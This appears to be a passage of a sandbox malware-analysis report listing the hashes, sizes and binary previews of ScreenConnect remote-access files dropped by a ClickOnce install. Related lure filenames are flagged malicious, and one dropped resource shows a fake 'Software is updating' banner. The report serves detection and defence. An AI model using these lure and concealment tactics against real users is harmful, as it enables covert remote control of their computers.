Preview:	PcmH........&,%...-F,...T.......T...............8...........+........<.g..J.\|r,..`P...............3LD.S.....U..c...................'-........s".I...R.....$...........3..L.G........6...................z..w.....[~31.X....y..&..d......B(.........[s.T..<....s".I...R......E..X.!...O.&r..Vz$......;..'..................."...%...(...0.......0.......0.......0...D...0...t...0................................................... .......0.......8...4...D.......x...P...l...........@...................,.......4.......D...(...L.......t.......\|...........(...............................(................... ...(...4.......\.......d...(...\|...................(...............L...........0...................................................................................................................................................................................................................................................................................................nameScreenConnect.Cl

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\manifests\scre..vice_4b14c015c87c1ad8_0018.0002_none_0564cf62aaf28471.manifest

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	1636
Entropy (8bit):	5.084538887646832
Encrypted:	false
SSDEEP:	24:JdFYZ8h9onRzgeP0AuS+vSkcyMuscbEMuscuMuscVSkcf5bdTo:3FYZ8h9o9gI0AJCHMrTMr3MrGAXTo
MD5:	E11E5D85F8857144751D60CED3FAE6D7
SHA1:	7E0AE834C6B1DEA46B51C3101852AFEEA975D572
SHA-256:	ED9436CBA40C9D573E7063F2AC2C5162D40BFD7F7FEC4AF2BEED954560D268F9
SHA-512:	5A2CCF4F02E5ACC872A8B421C3611312A3608C25EC7B28A858034342404E320260457BD0C30EAEFEF6244C0E3305970AC7D9FC64ECE8F33F92F8AD02D4E5FAB0
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0" xmlns:asmv2="urn:schemas-microsoft-com:asm.v2" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd">.. <assemblyIdentity name="ScreenConnect.ClientService" processorArchitecture="msil" publicKeyToken="4B14C015C87C1AD8" version="24.2.10.8991" />.. <file name="ScreenConnect.ClientService.dll" />.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="mscorlib" publicKeyToken="b77a5c561934e089" version="2.0.0.0" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Core" publicKeyToken="4b14c015c87c1ad8" version="24.2.10.8991" />.. </dependentAssembly>.. </dependency>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity name="ScreenConnect.Windows" publicKeyToken="4b14c015c87c1ad8" versio

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.ClientService.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	95520
Entropy (8bit):	6.505346220942731
Encrypted:	false
SSDEEP:	1536:rg1s9pgbNBAklbZfe2+zRVdHeDxGXAorrCnBsWBcd6myJkgoT0HMM7CxM7:khbNDxZGXfdHrX7rAc6myJkgoT0HXN7
MD5:	361BCC2CB78C75DD6F583AF81834E447
SHA1:	1E2255EC312C519220A4700A079F02799CCD21D6
SHA-256:	512F9D035E6E88E231F082CC7F0FF661AFA9ACC221CF38F7BA3721FD996A05B7
SHA-512:	94BA891140E7DDB2EFA8183539490AC1B4E51E3D5BD0A4001692DD328040451E6F500A7FC3DA6C007D9A48DB3E6337B252CE8439E912D4FE7ADC762206D75F44
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse Filename: E_BILL0041272508.exe, Detection: malicious, Browse Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse Filename: VD01NDHM8u.exe, Detection: malicious, Browse Filename: vovE92JSzK.exe, Detection: malicious, Browse Filename: s9POKY8U8k.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(..qF.qF.qF....qF.....qF....qF.<.B.qF.<.E.qF.<.C.qF....qF.#..qF.qG..qF.2.O.qF.2...qF.2.D.qF.Rich.qF.........................PE..L.....wc...............!.............!............@.......................................@.................................p...x....`..X............L.. )...p......`!..p............................ ..@............................................text...:........................... ..`.rdata...f.......h..................@..@.data........@.......,..............@....rsrc...X....`.......6..............@..@.reloc.......p.......<..............@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	61216
Entropy (8bit):	6.31175789874945
Encrypted:	false
SSDEEP:	1536:SW/+lo6MOc8IoiKWjbNv8DtyQ4RE+TC6VAhVbIF7fIxp:SLlo6dccl9yQGVtFra
MD5:	6DF2DEF5E591E2481E42924B327A9F15
SHA1:	38EAB6E9D99B5CAEEC9703884D25BE8D811620A9
SHA-256:	B6A05985C4CF111B94A4EF83F6974A70BF623431187691F2D4BE0332F3899DA9
SHA-512:	5724A20095893B722E280DBF382C9BFBE75DD4707A98594862760CBBD5209C1E55EEAF70AD23FA555D62C7F5E54DE1407FB98FC552F42DCCBA5D60800965C6A5
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: Scan_doc_09_16_24_1203.exe, Detection: malicious, Browse Filename: E_BILL0041272508.exe, Detection: malicious, Browse Filename: Scan_PDF_5255303072.exe, Detection: malicious, Browse Filename: invoice-benefits-agency9-24-2024.exe, Detection: malicious, Browse Filename: Scan_PDF_2017163298.exe, Detection: malicious, Browse Filename: He6pI1bhcA.exe, Detection: malicious, Browse Filename: 5eRyCYRR9y.exe, Detection: malicious, Browse Filename: VD01NDHM8u.exe, Detection: malicious, Browse Filename: vovE92JSzK.exe, Detection: malicious, Browse Filename: s9POKY8U8k.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...L............."...0.................. ........@.. ....................... ......3]....@.....................................O.......,............... )..............8............................................ ............... ..H............text........ ...................... ..`.rsrc...,...........................@..@.reloc..............................@..B........................H........S......................x.........................................(....^.(.......a...%...}....:.(......}....:.(......}....:.(......}........0..........(....(....(....(....r...p(....o....(....r...p..~....(....(....r9..p..~....(....(.....g~).....(....rY..p.(....&(.....(....s....( ...s....(!......0...........(".....(#.....($....s....%.o%...%.o&...%.o'...%s!...o(...%~....o)...}......(....o*...o+....(,.....@...%..(.....o-....s....}.....{...........s/...o0....s....}..

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsBackstageShell.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsClient.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.862223562830496
Encrypted:	false
SSDEEP:	1536:/tytl44RzbwI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7Yp7gxd:8/KukLdUpc
MD5:	B1799A5A5C0F64E9D61EE4BA465AFE75
SHA1:	7785DA04E98E77FEC7C9E36B8C68864449724D71
SHA-256:	7C39E98BEB59D903BC8D60794B1A3C4CE786F7A7AAE3274C69B507EBA94FAA80
SHA-512:	AD8C810D7CC3EA5198EE50F0CEB091A9F975276011B13B10A37306052697DC43E58A16C84FA97AB02D3927CD0431F62AEF27E500030607828B2129F305C27BE8
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P............"...0..@...........^... ...`....@.. .......................`......j.....@..................................^..O....`.. ............... )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc... ....`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre...exe_25b0fbb6ef7eb094_0018.0002_none_98a7d58e59681f92\ScreenConnect.WindowsFileManager.exe.config

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..core_4b14c015c87c1ad8_0018.0002_none_5411371a15332106\ScreenConnect.Core.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	548864
Entropy (8bit):	6.031251664661689
Encrypted:	false
SSDEEP:	6144:7+kYq9xDsxaUGEcANzZ1dkmn27qcO5noYKvKzDrzL9e7eOJsXziIYjVtkb+vbHq+:7SHtpnoVMlUbHbBaYLD
MD5:	16C4F1E36895A0FA2B4DA3852085547A
SHA1:	AB068A2F4FFD0509213455C79D311F169CD7CAB8
SHA-256:	4D4BF19AD99827F63DD74649D8F7244FC8E29330F4D80138C6B64660C8190A53
SHA-512:	AB4E67BE339BECA30CAB042C9EBEA599F106E1E0E2EE5A10641BEEF431A960A2E722A459534BDC7C82C54F523B21B4994C2E92AA421650EE4D7E0F6DB28B47BA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...z............." ..0..X...........r... ........... ...............................D....@..................................r..O....................................q..8............................................ ............... ..H............text....V... ...X.................. ..`.rsrc................Z..............@..@.reloc...............^..............@..B.................r......H........B......................xq........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..dows_4b14c015c87c1ad8_0018.0002_none_58890efb51813436\ScreenConnect.Windows.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721856
Entropy (8bit):	6.639136400085158
Encrypted:	false
SSDEEP:	24576:gx5x94kEFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPo:gx5xKkEJkGYYpT0+TFiH7efP
MD5:	9F823778701969823C5A01EF3ECE57B7
SHA1:	DA733F482825EC2D91F9F1186A3F934A2EA21FA1
SHA-256:	ABCA7CF12937DA14C9323C880EC490CC0E063D7A3EEF2EAC878CD25C84CF1660
SHA-512:	FFC40B16F5EA2124629D797DC3A431BEB929373BFA773C6CDDC21D0DC4105D7360A485EA502CE8EA3B12EE8DCA8275A0EC386EA179093AF3AA8B31B4DD3AE1CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...l............" ..0..>...........]... ...`....... ..............................[.....@................................./]..O....`...............................\..8............................................ ............... ..H............text....=... ...>.................. ..`.rsrc........`.......@..............@..@.reloc...............D..............@..B................c]......H.......t...h..............0....\........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	601376
Entropy (8bit):	6.185921191564225
Encrypted:	false
SSDEEP:	6144:r+z3H0n063rDHWP5hLG/6XixJQm16Eod7ZeYai1FzJTZJ5BCEOG6y9QsZSc4F2/Q:qzEjrTWPMLBfWFaSdJ5BeG6xs6/yRod
MD5:	20AB8141D958A58AADE5E78671A719BF
SHA1:	F914925664AB348081DAFE63594A64597FB2FC43
SHA-256:	9CFD2C521D6D41C3A86B6B2C3D9B6A042B84F2F192F988F65062F0E1BFD99CAB
SHA-512:	C5DD5ED90C516948D3D8C6DFA3CA7A6C8207F062883BA442D982D8D05A7DB0707AFEC3A0CB211B612D04CCD0B8571184FC7E81B2E98AE129E44C5C0E592A5563
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_b558103dfe170413\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...{<............"...0.................. ... ....@.. .......................`.......x....@.................................=...O.... .................. )...@..........8............................................ ............... ..H............text...`.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................q.......H........H................................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..ient_4b14c015c87c1ad8_0018.0002_none_ea2694ec2482770a\ScreenConnect.Client.dll

Download File

Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	197120
Entropy (8bit):	6.58476728626163
Encrypted:	false
SSDEEP:	3072:CxGtNaldxI5KY9h12QMusqVFJRJcyzvJquFzDvJXYrR:BtNalc5fr12QbPJYaquFGr
MD5:	AE0E6EBA123683A59CAE340C894260E9
SHA1:	35A6F5EB87179EB7252131A881A8D5D4D9906013
SHA-256:	D37F58AAE6085C89EDD3420146EB86D5A108D27586CB4F24F9B580208C9B85F1
SHA-512:	1B6D4AD78C2643A861E46159D5463BA3EC5A23A2A3DE1575E22FDCCCD906EE4E9112D3478811AB391A130FA595306680B8608B245C1EECB11C5BCE098F601D6B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...Z<..........." ..0.................. ... ....... .......................`............@.................................-...O.... .......................@..........8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................a.......H...........(............^................................................(......(....^.(...........%...}....:.(......}....:.(......}....:.(......}......{....:.(......}.....0..A........(....s....%.~(...%-.&~'.....y...s....%.(...(...+(...+o"...o........0..s.......~#.....2. ....+...j..... ......... ...............%.r...p.%.r...p............%.&...($....5..............s%....=.....0...........~...%-.&~).....\|...s&...%....(...+..~+...%-.&~).....}...s(...%.+...(...+.r9..

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.Override.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	369
Entropy (8bit):	4.898555474937936
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+oHO8fTG6cAtuRTAlrRF4l1tYMHwerc4KC:rHy2DLI4MWoHO8L9cAgRMZRCl1tYMHc6
MD5:	E6669504E0A5F3812CD3FE666F67F1EC
SHA1:	E552F6177354764FAFC0524CD24D5949ECFB1C70
SHA-256:	C15626455A649C93BF68D28A8296A0265ECC0A890EC301A435DAB03A1828884F
SHA-512:	F5ADA663869C1284FE85F2F49E88C2493DAE9C505F7452309DB167B2DD1F5CF6AB67838741ED0FB03C87ED443815BD4119FB0EE47E141D39A1E443DA4172EF41
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP@To...n_%.......&... A.p.p.l.i.c.a.t.i.o.n.T.i.t.l.e.....8U.n.d.e.r.C.o.n.t.r.o.l.B.a.n.n.e.r.T.e.x.t.F.o.r.m.a.t.@....>Software is updating... Please do not turn off your computer!...Updateing

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.Override.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	257
Entropy (8bit):	4.896176001960815
Encrypted:	false
SSDEEP:	6:8kVXdyrKDLIP12MUAvvR+ojlX2epExpKCl1nSJk0k:rHy2DLI4MWoj12eKfKCKxk
MD5:	C72D7889B5E0BB8AC27B83759F108BD8
SHA1:	2BECC870DB304A8F28FAAB199AE6834B97385551
SHA-256:	3B231FF84CBCBB76390BD9560246BED20B5F3182A89EAF1D691CB782E194B96E
SHA-512:	2D38A847E6DD5AD146BD46DE88B9F37075C992E50F9D04CCEF96F77A1E21F852599A57CE2360E71B99A1CCBC5E3750D37FDB747267EA58A9B76122083FB6A390
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP..........6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.......#03c6fc.

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.en-US.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	50133
Entropy (8bit):	4.759054454534641
Encrypted:	false
SSDEEP:	1536:p1+F+UTQd/3EUDv8vw+Dsj2jr0FJK97w/Leh/KR1exJKekmrg9:p1+F+UTQWUDv8vw+Dsj2jr0FJK97w/LR
MD5:	D524E8E6FD04B097F0401B2B668DB303
SHA1:	9486F89CE4968E03F6DCD082AA2E4C05AEF46FCC
SHA-256:	07D04E6D5376FFC8D81AFE8132E0AA6529CCCC5EE789BEA53D56C1A2DA062BE4
SHA-512:	E5BC6B876AFFEB252B198FEB8D213359ED3247E32C1F4BFC2C5419085CF74FE7571A51CAD4EAAAB8A44F1421F7CA87AF97C9B054BDB83F5A28FA9A880D4EFDE5
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP.q...'..6....wp.......y....C\|.)>..Ldt..... $...X..........1$.../...2.%%3./>>...L.y.0.C._.........1Y..Qj.o....<....=...R..;...C....&.......1p2.r.x.u?Y..R...c......X.....I.5.2q..R...>.E.pw .@ ).w.l.....S...X..'.C.I......-.Y........4.J..P<.E..=c!.@To..#.._.2.....K.!..h...z......t......^..4...D...f..Q...:..%.z.<......^.....;<...r..yC.....Q........4_.Sns..z.......=..]t...X..<....8.e`}..n....S.H[..S@?.~....,...j.2..v.......B....A...a......D..c..w..K,..t...S.....v....7.6\|..&.....r....#....G......Y...i..'.............'.......Z.....#2e..........\|....)..%....A.....4{..u;N......&q...}.tD..x.....4...J...L......5.Q..M....K..3U..M..............5...........t.>.......lYu....3TY.?...r...'.......3.m........=.H...#.o.........n.....,4.~...<h..u...i.H...V......V/...P.$%..z...

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\Client.resources

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	data
Category:	dropped
Size (bytes):	26722
Entropy (8bit):	7.7401940386372345
Encrypted:	false
SSDEEP:	384:rAClIRkKxFCQPZhNAmutHcRIfvVf6yMt+FRVoSVCdcDk6jO0n/uTYUq5ZplYKlBy:MV3PZrXgTf6vEVm6zjpGYUElerG49
MD5:	5CD580B22DA0C33EC6730B10A6C74932
SHA1:	0B6BDED7936178D80841B289769C6FF0C8EEAD2D
SHA-256:	DE185EE5D433E6CFBB2E5FCC903DBD60CC833A3CA5299F2862B253A41E7AA08C
SHA-512:	C2494533B26128FBF8149F7D20257D78D258ABFFB30E4E595CB9C6A742F00F1BF31B1EE202D4184661B98793B9909038CF03C04B563CE4ECA1E2EE2DEC3BF787
Malicious:	false
Preview:	...........lSystem.Resources.ResourceReader, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089#System.Resources.RuntimeResourceSet............PADPADP)...s^.J.....E.....(....jF.C...1P)...H..../..72J..I.J.a.K8c._.ks`.k.`.kK..m.M6p............b...P...........'...!...............K...............w.......P.......1......."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.1.6.....$A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.2.5.6....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.3.2....."A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.4.8.....,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.B.l.a.n.k.1.6.;...(A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.M.a.c.2.2.....0A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.O.p.a.q.u.e.1.9.2.8...,A.p.p.l.i.c.a.t.i.o.n.I.c.o.n.T.i.t.l.e.1.6.....6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.C.o.l.o.r.4...6B.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.:...DB.l.a.n.k.M.o.n.i.t.o.r.B.a.c.k.g.r.o.u.n.d.I.m.a.g.e.V.i.s.i.b.l.e.xb..B.l.a.n.k.M.o.n.i.t.o.r.T.e.x.t.C.o.l.o.r..b..D.a.r.k.T.h.e.m.e.B.a.r.B.a.s.e.C.o.l.o.r..b..<D.a.r.k.T.h.

C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\app.config

Download File

Process:	C:\Users\user\AppData\Local\Apps\2.0\N792AEZK.T2T\924ZHOM1.D1T\scre..tion_25b0fbb6ef7eb094_0018.0002_8dd4fc92cc8095f0\ScreenConnect.WindowsClient.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	4.690426481732819
Encrypted:	false
SSDEEP:	48:OhMOdH55AfdH85AfdHfh/dH8h/dHmh/dHH/dHS/dH0/dHjdH6dH/dHAdHKdH3dHX:o3H52H82HzHAHyHVHeHMHZHUH1HyHkHN
MD5:	2744E91BB44E575AD8E147E06F8199E3
SHA1:	6795C6B8F0F2DC6D8BD39F9CF971BAB81556B290
SHA-256:	805E6E9447A4838D874D84E6B2CDFF93723641B06726D8EE58D51E8B651CD226
